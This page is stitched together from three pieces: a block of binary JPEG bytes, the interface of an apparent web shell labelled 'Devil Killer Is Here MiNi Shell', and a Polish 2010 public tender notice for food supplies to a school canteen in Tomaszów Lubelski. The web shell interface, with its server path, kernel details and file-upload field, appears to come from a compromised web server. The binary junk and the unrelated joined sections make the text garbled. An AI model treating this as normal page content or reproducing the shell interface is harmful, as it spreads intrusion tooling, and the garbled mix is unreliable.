JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100803/236186-N-2010.html

<p class="kh_header"><b>Tomaszów Lubelski: SUKCESYWNA DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁÓWKI SZKOLNEJ PRZY INTARNACIE ZESPOŁU SZKÓŁ NR 1 W TOMASZOWIE LUBELSKIM, UL. Wyspiańskiego 8</b><br>
<b>Numer ogłoszenia: 236186 - 2010; data zamieszczenia: 03.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 1 , ul. Wyspiańskiego 8, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6642445, faks 084 6643206.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNA DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO STOŁÓWKI SZKOLNEJ PRZY INTARNACIE ZESPOŁU SZKÓŁ NR 1 W TOMASZOWIE LUBELSKIM, UL. Wyspiańskiego 8.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych do stołówki szkolnej przy internacie Zespołu Szkół nr 1 w Tomaszowie Lubelskim przy ul. Wyspiańskiego 8
Przedmiot zamówienia został podzielony na 12  CZĘŚCI od nr I do XII .

  CZĘŚĆ  I  	PIECZYWO	 Kod CPV- 15612500-6-6	
  CZĘŚĆ  II 	MLEKO I JEGO PRZETWORY	kod CPV    -15500000-3	
  CZĘŚĆ  III 	MIĘSO  i   PRODUKTY  WĘDLINIARSKIEKod CPV 15100000-9 , CPV 15131120-2
  CZĘŚĆ  IV 	RÓŻNE PRODUKTY SPOŻYWCZE	Kod CPV 15800000-6
  CZĘŚĆ  V 	RYBY PRZETWORZONE I KONSERWOWANE	Kod CPV 15200000-0
  CZĘŚĆ  VI 	DRÓB				Kod CPV 15112000-6
  CZĘŚĆ  VII 	MROŻONKI    			Kod CPV 15331100-8
  CZĘŚĆ   VIII 	OWOCE  ŚWIEŻE		Kod CPV 03121000-5
  CZĘŚĆ   IX	WARZYWA 			Kod CPV 15300000-1 
  CZĘŚĆ   X 	JAJA KURZE 			Kod CPV03142500-3
  CZĘŚĆ   XI 	PRODUKTY MĄCZNE GOTOWE 	Kod CPV 15851000-8
  CZĘŚĆ XII       ZIEMNIAKI 			kod CPV 03212100-1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.25.00-6, 15.50.00.00-3, 15.10.00.09-, 15.80.00.00-6, 15.20.00.00-0, 15.11.20.00-6, 15.33.11.00-8, 03.12.10.00-5, 15.30.00.00-1, 03.14.25.00-3, 15.85.10.00-8, 03.21.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki określone  w  art. 22 ustawy 1  oraz wykażą brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art.24 ust.1 ustawy PZP.
Zgodnie z art.22 ust.1 ustawy, o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:

5.1	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
5.2	Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art.23 ustawy
W przypadku złożenia oferty wspólnej żaden z wykonawców nie może podlegać wykluczeniu z powodu nie spełnienia warunków o których mowa w art.24 ust.1 ustawy Prawo Zamówień Publicznych, natomiast warunki określone w art. 22 ust.  Pkt. 2,3 i 4 wymienionej wyżej ustawy Wykonawcy mogą spełniać wspólnie.
5.3	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie wykonania zamówienia publicznego.
5.5  Sprawdzenie warunków udziału w postępowaniu   odbywać się będzie na postawie przedłożonych przez wykonawcę dokumentów i oświadczeń na zasadzie spełnia /nie spełnia/. Niespełnienie jednego warunku, skutkować  będzie wykluczeniem wykonawcy z postępowania. Z treści złożonych dokumentów musi jednoznacznie wynikać , iż wyżej wymienione warunki zostały spełnione przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> /www.lo-tomaszow.pl/przetargi.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 1 w Tomaszowie Lubelskim, ul. Wyspiańskiego 8, 22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2010 godzina 12:00, miejsce: Zespól Szkół Nr 1 w Tomaszowie Lubelskim, ul. Wyspiańskiego 8, 
22-600 Tomaszów Lubelski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb  zwykły  krojony    500 g	szt.	3000
2	Bułka   50g.	szt.	5000
3	Bułka tarta 100g	szt.	100
4	Drożdżówka 100 g	szt.	500
5	Pączki  80 g	Szt 	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZTWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko spożywcze 2%  tł.  w opak. 1 l.litr	350
Śmietana 18 % tł.   litr	500
Masło ex .zawartość tł. 82,5%      op. 0.200 g	kg.	10
Twaróg półtłusty kg.	90
Ser żółty salami	Kg.	70
Jogurty  kubek  150 ml. 	Szt.	500
Serek homogenizowany op.100 g	Szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO I PRODUKTY WĘDLINIARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Boczek surowy	kg	10
Boczek wędzony parzony	kg	10
słonina	kg.	50
Łopatka wieprzowa b/ kośći	kg.	220
Karkówka wieprzowa b/k	kg.	250
Schab  b/k 	kg.	240
baleron	kg	20
Kiełbasa krakowska 	kg	35
Kiełbasa żywiecka 	kg	35
Kiełbasa zwyczajna	kg	50
Kiełbasa łopatkowa	kg	30
Kiełbasa podwawelska 	kg	40
Mielonka prasowana Tyrolska 	kg	40
Paróweczki  wieprzowe	kg	100
Pasztet pieczony	kg	20
Szynka wieprzowa domowa	kg	60
Polędwica sopocka 	kg	50
Przysmak śniadaniowy	kg	20
Pieczeń chlebowa	kg	50
        ogonówka	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier biały kryształ- luzem a 50 kg 	420	Kg
Barszcz czerwony konc w płynie 330 milil	30	szt
Cukier waniliowy 	30	Szt
Barszcz czerwony inst. słoik 160 g 40	Szt
Chrzan tarty w słoiku op.   Nie mniej jak 200 g 	50	Szt
Kakao ciemne sypkie op. nie mniej jak 100 g 	20	Szt
Dżem wiśniowy  nie mniej jak 280 	200	Szt
Dżem  truskawkowy nie mniej jak 280 g 	200	Szt
Dżem  śliwkowy - nie mniej jak 280g 	200	Szt
Ciastka kruche luz 	30	kg
Krem chrzanowy op do 200g  150	szt
Fasolka konserwowa czerwona op. nie mniejsze jak 400g 	20	szt
Groszek konserwowy  op.nie mniej jak 400 g  	60	Szt
Cukierki czekol. luzem	30	kg
Herbata granulowana 100 g 	200	Szt
Herbata Lipton expresowa op 200g	10	Op
Kawa inka  op.  nie mniejsze jak 200 g 	20	Szt
Keczup   PIKANTNY   firmy Roleskiej lub inny równoważny opakowaniu  nie mnie jak   500 g 250	Szt
Keczup łagodny poj nie mniej jak 500 g  	50	szt
Koncentrat pomidorowy 30 % op. 900 ml 	60	Szt
Papryka mielona ostra  op.nie mniej jak 20 g	20	Szt
Kukurydza konserwowa  słodka  -op.nie mniejsze jak 400 g  100	Szt
Kwasek cytrynowy nie mniej jak  20g 	90	Szt
Majonez  dekoracyjny nie mniej  jak 700 g Firmy Winiary lub inny równoważny	100	Szt
Musztarda  kremska op. nie mniej 180g 	150	Szt
Majeranek  torebka 20g     	60	kg
Seler konserwowy op. 05 l	30	Szt
Ocet  spirytusowy 10 %  op. 05l.	10	Szt
Ogórek konserwowy poj 0,9l 	 50	szt
Przyprawa do zup w płynie  op. - 1 l Firmy Winiar lub inny równoważny 50	Szt
Pieprz naturalny czarny mielony- op nie mniej jak 20 g  	150	Szt
Pieprz ziołowy  torebka  op.  nie mniej jak 20 g	150	Szt
Papryka w proszku słodka mielona torebka  20 g	50	Szt
Pietruszka susz-  natka op nie mnie jak  20 g 	60	Szt
Koper susz  op. nie mniej jak 25 g 	60	Kg
Przyprawa do potraw typu Vegeta lub równoważny op. 500 g	120	Szt
Przyprawa do potraw op.200g Podarka lub równoważny	50	szt
Ryż biały  op. 1 kg	70	Kg
Rosołki drobiowe op. 180 g  Firmy Winiar lub równoważny	100	Op
Sól kuchenna  spożywcza  1 kg	80	Kg
Ziele angielskie torebka 15 g	4	kg
Liść laurowy  torebka 15 g	70	Szt
Mąka ziemniaczana  op. 100 g 	15	szt
Mąka pszenna  typ  450   	130	Kg
Olej jadalny Uniwersalny op. 3 l.	25	Szt
Olej  jadalny uniwersalny Op. 1 litr	400	Szt
Margaryna stołowa zwykła kostka  250 g	50	Szt
Margaryna  śniadaniowa z zaw. Olejów  roślinnych  op.500 g 	300	kg
Kasza jęczmienna  wiejska  op.500g 70	szt
Kisiel	50	szt
Kasza gryczana  500 g 	80	szt
Płatki  kukurydz. 250 grNESKWIK lub równoważne	180	Szt.
Papryka mielona słodka op.nie mniej jak 20 g	20	Szt
Ser topiony bloczek 100 g 	130	szt
Ser topiony Rama krem nie mniej jak 180 g	60	szt
Pieczarka konserwowa poj.800 ml	 40	Szt
Makaron wstążka op.0,500 g Lubella lub inny  równoważny 	20	Szt
Makaron  nitka   op. 500g Lubella  lub inny  równoważny	30	kg
Makaron  świderki   op.400g Lubella lub inny równoważny	120	Szt
Makaron  nitki  spagetti  op.400 g Lubella lub inny równoważny   	120	Szt
makaron kolanka op. 0,5kg Lubella  lub inny równoważny	30	Szt
Makaron łazanki  op.0,5 kg Lubella lub inny równoważny 	100	Szt
Serek top. Krążki  op. 140g Hohland lub równoważny	100	szt
Serek top. plastry op.150g Hohland lub równoważny 200	Szt
Szyneczka  drobiowa  Polska 110g	500	Szt
Szyneczka   mielona 110 g	200	Szt
Pasztet drobiowy  nie mniej jak op. 130g 	500	Szt
Pasztet drobiowy  nie mniej jak 290g 50	szt
Paluszki słone opakowanie  0,80 g 200	Szt
  Barszcz biały op 3 kg  	15	kg
 Zupa ogonowa op.3 kg	10	kg
Baton czekoladowy   op. do 40 g	300	szt
Czekolada Wedell lub inna równoważna  op. 100 g	300	Szt
Cukierki draże kawowe 80 g 	50	szt
Ser  Puszysty	90	Szt
Soda oczyszczona	20	szt
Delikat do ryb  nie mniej jak  0,25 g 	10	Kg
Delikat do drobiu 	10	Kg
Sos sałatkowy  ogrodowy lub równoważny	5	Kg
Sos cygański 	5	Kg
Sos pieczeniowy	6	kg
Przyprawa bazylia  nie mniej jak 0,10 g 	5	kg
Czosnek granulowany nie mniej jak 0, 16 g  	3	kg
Sos włoski nie mniej jak 0, 20 g 	2	kg
Fix do gulaszu  nie mniej jak 0,20 g  	6	kg
Sos boloński  nie mniej jak 0,48 g 	6	kg
Woda 1,5 l Nałęczowianka	20	szt
Soki owocowe 2 l  Caprio 	30	szt
Zupa pieczarkowa op.3 kg 	5	Kg
Barszcz czerwony op.3 kg	 9 Kg
Zupa pomidorowa op.3 kg 	 6	Kg
Rosół z kury op.1 kg	10	Kg
Zioła prowensalskie op nie mniej jak 0,10 g 	50	szt
Ananasy w puszkach 	40	szt
Napój niegazow.op.1,5 l  	 40	szt
Szczaw konserwowy 300 g 	 60	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z ryby   Dorsz mrożona kg	150
Filety śledziowe matjasy  małosolne           	kg	15
Konserwa rybna  śledż w oleju  op. nie mniej jak   170 g	sz	100
Konserwa rybna śledż w pomidorach op. nie mniej jak 170 g	szt	100
Paprykarz   szczeciński -op. nie mniej jak 300 g	szt	100
Filet z soli	kg	150
Kotlety rybne panierowane	kg 	60
Bryza płaty w oleju 8 kg	Op. szt	5
Płat śledziowy po cygańsku 0,5 kg	szt	15
Płat po wiejsku op.2 kg	szt	20
Matjas op 4 kg   solony	szt	10
Tuńczyk w oleju 170 gr	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet drobiowy  mrożony	kg.	200
Porcje rosołowe	kg.	60
Udka drobiowe mrożone  	kg.	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka warzywna -bukiet jarzyn 
mrożona 6 skł.op.2,50 kg	kg	 70
Marchew mrożona  op.10 kg 	kg	30
Porzeczka mrożona   op.2.50 kg	Kg 	120
Wiśnia mrożona  op.2.50 kg	kg	120
Kalafior mrożony  op.2.50 kg	kg	50
Truskawka mrożona  op.2,50 kg	Kg 	120
Marchew z groszkiem  op.2.50 kg	kg	60
Włoszczyzna  op.2.50 	kg	160
Zupa pieczarkowa  op.2,50 kg 	kg	60
Fasola zielona  2,50 kg op,	kg	30
Fasola żółta  2,50 kg op.	kg	30
Brokuły   2,50 kg op.	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OWOCE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jabłka  gat.I 	kg	 300
Gruszki 	Kg 	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WARZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buraki ćwikła 	kg.	250
Cebula  biała	kg.	150
marchew	kg.	100
seler 	kg.	20
por 	kg.	60
Pietruszka korzeń 	kg.	10
Kapusta czerwona	kg.	120
Kapusta biała 	kg.	500
Cytryny  	kg.	40
